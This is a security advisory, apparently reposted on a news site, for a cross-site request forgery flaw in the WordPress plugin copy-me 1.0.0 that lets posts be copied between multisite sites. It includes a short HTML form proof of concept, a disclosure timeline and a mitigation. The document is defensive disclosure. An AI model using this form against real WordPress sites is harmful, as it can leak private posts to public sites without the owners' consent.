WordPress Plugin copy-me vulnerable to CSRF, which allows unauthenticated attacker to copy posts.
WordPress is web software you can use to create a beautiful website, blog, or app. We like to say that WordPress is both free and priceless at the same time.
Version 4.7 of WordPress, named “Vaughan” in honor of legendary jazz vocalist Sarah “Sassy” Vaughan, is available for download or update in your WordPress dashboard. New features in 4.7 help you get your site set up the way you want it.
copy-me plugin allows users to copy a post, page or custom post type to another site in a WordPress.
This plugin does not use nonces. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.
This attack is classified as OWSAP 10 CSRF(Cross-Site Request Forgery).
Software: copy-me
Version: 1.0.0
Homepage: http://wordpress.org/plugins/copy-me/
Advisory report: dxw security
CVE: Awaiting assignment
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
Click submit and it’ll copy post with ID 1 to blog/site with ID 1:
<form method=\”POST\” action=\”http://localhost/wp-admin/admin-ajax.php\”;>
<input type=\”text\” name=\”action\” value=\”copyme_copy_item\”>
<input type=\”text\” name=\”id\” value=\”1\”>
<input type=\”text\” name=\”target\” value=\”1\”>
<input type=\”submit\”>
</form>
2016-11-01: Discovered by dewhurstsecurity
2016-12-07: Reported to vendor via contact form: http://www.alancesarini.com/en/contact-2/
2016-12-07: Requested CVE
2016-12-21: Vendor has not responded after 14 days
2016-12-21: Published
Disable the plugin. No fixed version released.
Phishing attackers used Google Docs to deliver malicious links, bypassing security measures and redirecting victims…
The Python-based NodeStealer, a sophisticated info-stealer, has evolved to target new information and employ advanced…
A significant XSS vulnerability was recently uncovered in Microsoft’s Bing.com, potentially allowing attackers to execute…
Meta has announced the removal of over 2 million accounts connected to malicious activities, including…
Critical security vulnerability has been identified in Veritas Enterprise Vault, a widely-used archiving and content…
A critical security vulnerability has been disclosed in the popular file archiving tool 7-Zip, allowing…